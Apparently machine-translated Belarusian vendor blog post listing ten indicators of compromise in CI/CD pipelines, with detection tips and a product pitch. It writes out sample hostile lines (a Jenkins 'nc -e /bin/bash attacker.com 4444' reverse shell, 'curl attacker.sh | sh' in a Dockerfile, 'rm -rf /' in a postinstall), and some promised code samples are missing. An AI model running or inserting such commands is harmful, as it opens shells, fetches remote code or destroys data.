10 галоўных паказчыкаў кампрамісу ў CI/CD Pipelines

Уводзіны: Якія паказчыкі кампраметацыі ў кібербяспецы?

Прыкметы кампраметацыі — гэта першыя папераджальныя знакі таго, што ваша сістэма або pipeline можа быць пад атакай. Простымі словамі, паказчыкі кампрамісу сляды, пакінутыя нападнікамі, падобныя на дзіўныя loginс, змены файлаў або схаванае шкоднаснае праграмнае забеспячэнне. У Кібербяспека МАК, яны дзейнічаюць як адбіткі пальцаў на месцы злачынства, даючы вам відавочныя доказы таго, што нешта не так. Таму, калі распрацоўшчыкі пытаюцца якія паказчыкі кампрамісу, адказ не абмяжоўваецца серверамі або брандмаўэрамі, ён таксама ўключае рызыкі, схаваныя ў сучасных CI/CD pipelines.

У гэтых pipelineЗламыснікі могуць уносіць змены ў код, укараняць шкоднасныя залежнасці або змяняць этапы зборкі, не будучы заўважанымі. Аднак большасць кіраўніцтваў па-ранейшаму сканцэнтраваны толькі на серверах або сетках. У выніку ланцужок паставак праграмнага забеспячэння стаў адной з самых простых мішэняў.

Вось чаму пошук паказчыкаў кампрамісу ў CI/CD pipelines мае важнае значэнне. Перш за ўсё, гэта дапамагае камандам блакаваць шкоднасныя праграмы, абараняць сакрэты і забяспечваць бяспеку на кожным этапе распрацоўкі праграмнага забеспячэння.

10 галоўных паказчыкаў кампрамісу ў CI/CD Pipelines

Пры тлумачэнні паказчыкаў кампраметацыі большасць спісаў сканцэнтраваны на серверах або сетках. Тым не менш, у CI/CD pipelineЗламыснікі пакідаюць вельмі розныя адбіткі пальцаў. Распазнаванне гэтых сігналаў мае вырашальнае значэнне для праактыўнай абароны. Ніжэй прыведзены 10 чырвоных сцяжкоў кібербяспекі МОК, на якія павінен звярнуць увагу кожны распрацоўшчык і інжынер па бяспецы.

1. Падазроныя змены залежнасцей

Адзін з галоўных паказчыкаў кампрамісу ў pipelines — гэта раптоўнае, дзіўнае абнаўленне залежнасцей. Зламыснікі часта выкарыстоўваюць давер распрацоўшчыкаў да менеджараў пакетаў, каб дадаваць небяспечныя пакеты.

Напрыклад, у npm a package.json розніца можа раптам уключаць:

Такія змены могуць выглядаць бяспечнымі, але могуць увесці траянскі код у кожную зборку.

ўздзеянне: Узламаныя зборкі наследуюць шкоднаснае праграмнае забеспячэнне ў крыніцы.

Выяўленне: прымусова правяраць залежнасці, адсочваць розніцы ў файлах блакіроўкі і пастаянна сканаваць новыя пакеты.

2. Заблытаны код у зборках 

Аўтары шкоднасных праграм выкарыстоўваюць абфускацыю, каб абыйсці праверку. У выніку гэты паказчык кампраметацыі ў CI/CD pipelines можа быць адным з самых складаных для выяўлення. Насамрэч, заблытаныя карысныя нагрузкі часта праслізгваюць у бібліятэкі з адкрытым зыходным кодам або вобразы кантэйнераў без папярэджання.

Напрыклад:

  • Пакет PyPI з выкарыстаннем base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • Вобраз Docker, напоўнены непатрэбнымі бінарнымі файламі UPX.
  • JavaScript поўны \x41\x42 уцякае ад хаваючыхся выкрадальнікаў паўнамоцтваў.

ўздзеянне: Схаваны код выконваецца ціха падчас зборкі або выканання, што робіць гэта крытычна важным сігналам у кібербяспецы IOC.
Выяўленне: Спалучаць SAST з дапамогай сканавання на шкоднасныя праграмы для выяўлення закадаванага або спакаванага кода. Перш за ўсё, разглядайце заблытванне як чырвоны сцяжок, які патрабуе далейшага расследавання.

3. Сакрэты, раскрытыя ў Git: класічная рызыка кібербяспекі IOC

CI/CD pipelineчаста наследуюць сакрэты непасрэдна з рэпазіторыяў. Аднак калі сакрэты з'яўляюцца ў Git, яны становяцца адным з найбольш відавочных адказаў на пытанне «што з'яўляецца паказчыкамі кампрамісу ў pipeline«Пасля таго, як уліковыя дадзеныя трапляюць у Git, зламыснікі могуць выкарыстоўваць іх бясконца.

Напрыклад:

  • A .env файл, які змяшчае AWS_SECRET_KEY=.
  • Уведзены токены config.json.
  • Сакрэты ўсё яшчэ бачныя ў гісторыі Git нават пасля выдалення.

ўздзеянне: Адкрытыя ключы даюць зламыснікам прамы доступ да CI/CD pipelineс, хмарныя сістэмы або базы дадзеных. Такім чынам, гэта адзін з самых небяспечных паказчыкаў кампраметацыі.
Выяўленне: Выкарыстоўваць pre-commit hooks і заданні CI для сакрэтнага сканавання і неадкладна адклікаць уцечку ключоў. Акрамя таго, прымусова ўкараняць аўтаматызаванае выпраўленне, каб скараціць перыяды рызыкі.

4. Падроблена Pipeline Канфігурацыі: схаваныя прыкметы кампраметацыі

Pipeline канфігурацыі з'яўляюцца каштоўнымі мэтамі, таму што адна мадыфікацыя часта перашкаджае ўсім працоўным працэсамТакім чынам, падробленыя pipeline Файлы ўяўляюць сабой сур'ёзную рызыку кібербяспекі МОК, якую традыцыйныя інструменты маніторынгу рэдка выяўляюць.

Напрыклад:

  • У дзеяннях GitHub:

  • У GitLab: дададзена шкоднаснае заданне .gitlab-ci.yml які скідае канфідэнцыйныя дадзеныя.
  • У Джэнкінсе: sh "nc -e /bin/bash attacker.com 4444".

ўздзеянне: Гэтыя неўхваленыя змены ператвараюць вашу pipeline у пастаянны бэкдор для зламыснікаў, што відавочна лічыцца паказчыкам кампраметацыі.
Выяўленне: Забяспечваць выкананне падпісаных канфігурацый, патрабаваць зацвярджэнняў PR і кантраляваць нечаканыя заданні. Акрамя таго, усталяваць guardrails якія аўтаматычна блакуюць змененыя працоўныя працэсы.

5. Прывілеяваны IaC Па змаўчанні 

Няправільна настроеныя азначэнні інфраструктуры часта ствараюць схаваныя бэкдоры. У выніку прывілеяваныя значэнні па змаўчанні ў IaC з'яўляюцца класічнай рызыкай кібербяспекі МАК.

Напрыклад:

  • Разгортванне Kubernetes, якое дае магчымасць атрымаць pod-файлы privileged: true.
  • Дыяграмы Helm, якія дэманструюць паслугі з дапамогай 0.0.0.0:22.

ўздзеянне: Зламыснікі атрымліваюць доступ да root-доступу або публічна раскрываюць унутраныя службы. Такім чынам, гэтыя праблемы значна пашыраюць паверхню атакі.
Выяўленне: Ужываць IaC сканаванне, каб забяспечыць мінімальны ўзровень прывілеяў перад аб'яднаннем. Акрамя таго, пераканайцеся, што кожная канфігурацыя правяраецца ў рамках pipeline.

6. Незвычайныя паводзіны зборкі 

Зламыснікі часта змяняюць pipeline паводзіны, якія могуць праслізгваць у шкоднасных дзеяннях. Іншымі словамі, незвычайная актыўнасць зборкі — адзін з самых відавочных адказаў на пытанне, што з'яўляецца паказчыкамі кампраметацыі ў CI/CD pipelines.

Напрыклад:

  • Зборкі, якія робяць выходныя сеткавыя запыты да незнаёмых даменаў.
  • Праект Node.js раптоўна запускае PowerShell падчас npm install.
  • Заданне CI загружае вялікія бінарныя файлы, не вызначаныя ў сцэнарах зборкі.

ўздзеянне: Узламаныя зборкі могуць выступаць у якасці кропак распаўсюджвання шкоднасных праграм. Перш за ўсё, яны распаўсюджваюць шкоднасныя карысныя нагрузкі па ўсім разгортванні.
Выяўленне: Сачыце за журналамі зборкі на наяўнасць нечаканых працэсаў або падключэнняў. Акрамя таго, наладзьце выяўленне анамалій, каб пазначаць паводзіны па-за межамі нормы.

7. Шкоднасныя скрыпты пакетаў як рызыкі кібербяспекі МОК

Жыццёвы цыкл падтрымкі менеджэраў пакетаў hooks якія выкарыстоўваюць зламыснікі. Такім чынам, шкоднасныя скрыпты ў npm, PyPI або Dockerfiles з'яўляюцца моцнымі прыкметамі кампраметацыі.

Напрыклад:

  • нпм: postinstall выконваецца скрыпт rm -rf / або перадача сігналу на C2.
  • PyPI: setup.py выкананне схаванага кода Python пры ўсталёўцы.
  • Докерфайл: RUN curl attacker.sh | sh.

ўздзеянне: Атака выконваецца падчас усталёўкі, перад любым тэставаннем падчас выканання. Такім чынам, распрацоўшчыкі могуць не заўважыць гэтага, пакуль не стане занадта позна.
Выяўленне: Сканіруйце маніфесты пакетаў на наяўнасць усталявальных скрыптоў. Акрамя таго, абмяжуйце рызыкоўныя hooks in CI/CD працоўныя месцы для зніжэння ўздзеяння.

8. Прыкметы ўзлому рэестра

Зламыснікі замяняюць або змяняюць артэфакты ў рэестрах, і гэтыя падзеі з'яўляюцца класічнымі прыкладамі таго, што з'яўляецца паказчыкамі кампраметацыі ў ланцужку паставак. pipelines.

Напрыклад:

  • Тэг выявы Docker ціха абнаўляецца з дапамогай траянскага слоя.
  • Унутраны пакет заменены на атручаную версію.
  • прысяданні ў прасторы імёнаў npm, напрыклад, lodash-proxy.

ўздзеянне: Кожная зборка, якая выкарыстоўвае артэфакт рэестра, становіцца ўзламанай. Больш за тое, узлом распаўсюджваецца на наступныя службы.
Выяўленне: Прымусова правяраць подпісы і цэласнасць усіх выцягнутых з рэестра дадзеных. Акрамя таго, адсочваць паходжанне артэфактаў з дапамогай SBOM праверка.

9. Анамальная актыўнасць карыстальнікаў як доказ МОК

Скампраметаваныя акаўнты амаль заўсёды пакідаюць пасля сябе незвычайныя сляды. Адпаведна, незвычайныя паводзіны распрацоўшчыка з'яўляюцца важкім паказчыкам кампраметацыі.

Напрыклад:

  • Commitбыло адсунута а 3-й гадзіне ночы па мясцовым часе.
  • Узгадненне PR-рэсурсаў кліентамі, якія знаходзяцца ў адпачынку.
  • Pipelineспрацоўвае з незвычайнай частатой.

ўздзеянне: Зламыснікі выкарыстоўваюць скрадзеныя ўліковыя дадзеныя для ўстаўкі шкоднасных змяненняў. У рэшце рэшт, несанкцыянаваныя commitлёгка ўпісваюцца ў звычайныя працоўныя працэсы.
Выяўленне: Кантраляваць SCM актыўнасць на наяўнасць анамалій, прымяненне шматфактарнай аўтэнтыфікацыі (MFA) і рэгулярная ратацыя токенаў. Акрамя таго, папярэджваць аб падазроных commit або мадэлі адабрэння.

10. Няўдалыя праверкі цэласнасці або подпісаў у кібербяспецы МАК

Распаўсюджаны, але ігнаруемы паказчык кампрамісу — гэта няўдалая праверка цэласнасці або подпісу. У кібербяспецы IOC гэтыя праверкі пацвярджаюць сапраўднасць кода або артэфактаў. Іх прапуск пакідае pipelineвыкрыты.

Прыклады:

  • Хэш SHA256 не адпавядае чаканай кантрольнай суме.
  • Адсутнічае або няправільнае подпіс GPG.
  • An SBOM паказваюць непадпісаныя артэфакты.

ўздзеянне: Парушэнні цэласнасці часта азначаюць падробку, атручванне рэестра або ўкараненне шкоднасных праграм.

Выяўленне: Аўтаматызуйце праверкі подпісаў, прымусова праверку кантрольных сум і блакуйце непадпісаныя кампаненты. Перш за ўсё, разглядайце кожную няўдалую праверку як відавочнае сведчанне кампраметацыі.

CI/CD Прыкметы кампрамісу з першага погляду

Індыкатар кампрамісу (МАК) Уплыў на CI/CD Pipelines Як выявіць
Падазроныя змены залежнасцей Зламыснікі ўкараняюць шкоднасныя бібліятэкі ў менеджары пакетаў, што прыводзіць да ўзлому зборак. Адсочвайце адрозненні ў файлах блакіроўкі, прымусова правярайце залежнасці і пастаянна скануйце залежнасці.
Заблытаны код у зборках Схаваныя карысныя нагрузкі выконваюцца падчас зборкі або выканання без выяўлення. Выкарыстоўваць SAST і сканаванне на наяўнасць шкоднасных праграм для выяўлення шаблонаў кода base64, шаснаццатковага або спакаванага кода.
Сакрэты, раскрытыя ў Git Уцечка токенаў або ключоў API дае зламыснікам прамы доступ да крытычна важных сістэм. Запускаць сакрэтныя сканы ў Git hooks і аўтаматычна адклікаць уцечку ўліковых дадзеных.
Падроблена Pipeline канфігурацыі Змененыя працоўныя працэсы дазваляюць выцясняць дадзеныя або захоўваць іх унутры CI/CD. Патрабаваць зацвярджэнне PR, прымусова выконваць падпісаныя канфігурацыі і кантраляваць pipeline змены.
Прывілеяваны IaC Па змаўчанні Занадта дазвольныя ролі або небяспечныя налады па змаўчанні раскрываюць воблачныя асяроддзі. Сканіруйце файлы Terraform, Kubernetes і Helm на наяўнасць мінімальных прывілеяў.
Незвычайныя паводзіны зборкі Pipelineвыкарыстоўваюцца ў якасці кропак распаўсюджвання шкоднасных праграм або для латэральнага перамяшчэння. Аналізуйце журналы зборкі на наяўнасць нечаканых загрузак, працэсаў або выходных выклікаў.
Шкоднасныя скрыпты пакетаў Схаваныя скрыпты да/пасля ўстаноўкі запускаюць карысныя нагрузкі перад тэставаннем падчас выканання. Блакіраваць рызыкоўныя скрыпты npm/PyPI і абмяжоўваць іх выкананне ў CI/CD працу.
Атручэнне рэестра Траянскія артэфакты замяняюць надзейныя вобразы або двайковыя файлы ў рэестрах. Правярайце кантрольныя сумы, прымусова праводзьце праверку подпісаў і праактыўна скануйце рэестры.
Анамальная актыўнасць карыстальнікаў Узламаныя акаўнты распаўсюджваюць шкоднасныя праграмы commits або трыгер pipelines. Выкананне шматфактарных мер, маніторынг commits для анамалій і аналізаваць login шаблоны.
Няўдалыя праверкі цэласнасці або подпісу Паказвае на падроблены код, залежнасці або выявы, якія ўваходзяць у pipeline. Аўтаматызуйце праверкі цэласнасці і блакуйце непадпісаныя або несупадаючыя кампаненты.

Чаму традыцыйная кібербяспека МАК не спраўляецца CI/CD Рызыкі

Большасць арганізацый ужо адсочваюць паказчыкі кампраметацыі на серверах, камп'ютарах або ў сетках. Аднак гэты класічны падыход да кібербяспекі IOC ігнаруе CI/CD pipelineы, якія цяпер з'яўляюцца адной з найбольш крытычных паверхняў для атакі. Фактычна, pipelineпаказваюць унікальныя сігналы кампраметацыі, якія традыцыйныя інструменты не могуць выявіць.

Паказчыкі кампрамісу ў традыцыйнай бяспецы

У традыцыйнай кібербяспецы МОК увага звычайна надаецца:

  • незвычайны loginабо IP-адрасы, якія сведчаць пра крадзеж уліковых дадзеных.
  • Падазроныя хэшы файлаў або змены ў рэестры, якія выяўляюць шкоднаснае праграмнае забеспячэнне.
  • Нечаканы выходны трафік, які паказвае на ўцечку дадзеных.

Гэта добра вядомыя паказчыкі, якія таксама адсочваюцца ў Фреймворк MITRE ATT&CK, які адлюстроўвае распаўсюджаныя паводзіны і тактыку праціўніка. Гэта карысныя сігналы. Аднак яны ў асноўным тычацца аперацыйных сістэм або карпаратыўных сетак. У выніку яны не заўважаюць тонкага ўмяшання, якое адбываецца раней у ланцужку паставак праграмнага забеспячэння.

Чаму CI/CD Pipelines адрозніваюцца

CI/CD pipeline— гэта аўтаматызаваныя асяроддзі, дзе распрацоўшчыкі commit код, залежнасці, якія выцягваюцца, і зборкі, якія выпускаюцца. Зламыснікі ведаюць, што адно кампраметаванне тут распаўсюджваецца на кожнае разгортванне. Адпаведна, якія індыкатары кампраметацыі ў CI/CD pipelines? Яны выглядаюць вельмі па-рознаму:

  • Шкоднасная залежнасць, ціха дададзеная ў package.json або requirements.txt.
  • Ключы або токены API, даступныя ў Git commits або файлы .env.
  • Заблытаны код, уведзены ў пакеты npm або PyPI.
  • Файлы Terraform або Kubernetes з небяспечнымі значэннямі па змаўчанні, такімі як privileged: true.
  • Pipeline заданні, адрэдагаваныя для выкрадання дадзеных або адкрыцця бэкдораў.

Гэтыя сігналы кампрамісу ў CI/CD заставацца нябачным для standard інструменты бяспекі.

Прабел у кібербяспецы МОК

Нягледзячы на ​​тое, што многія каманды разумеюць каштоўнасць індыкатараў кампраметацыі, яны ўсё яшчэ абапіраюцца толькі на выяўленне з сервераў і сеткавых журналаў. Такім чынам, зламыснікі могуць атруціць зборкі або ўставіць шкоднаснае праграмнае забеспячэнне, не пакідаючы звычайных слядоў. Вось чаму такія інцыдэнты, як бэкдор XZ Utils або шкоднасныя npm-пакеты, заставаліся незаўважанымі, пакуль не дасягнулі прадукцыйнай версіі.

Гэтыя віды кампрамісаў у ланцужку паставак таксама падкрэсліваюцца CISКіраўніцтва па бяспецы ланцужкоў паставак ад А, які папярэджвае, што зламыснікі ўсё часцей нацэльваюцца на CI/CD pipelineі рэестры.

Ежа на вынас

Традыцыйная кібербяспека МОК неабходная, але недастатковая. Перш за ўсё, каманды павінны распазнаваць прыкметы кампраметацыі, характэрныя для CI/CD pipelineс. Толькі тады яны могуць выявіць шкоднасны код або pipeline злоўжыванні, перш чым яны распаўсюдзяцца па асяроддзі.

інструменты-для-аналізу-складання-праграмнага ...
Прыярытэзуйце, ліквідуйце і абараняйце свае праграмныя рызыкі
Атрымайце свой бясплатны рахунак.
Не патрабуецца крэдытная карта.

Забяспечце распрацоўку і пастаўку праграмнага забеспячэння

з пакетам прадуктаў Xygeni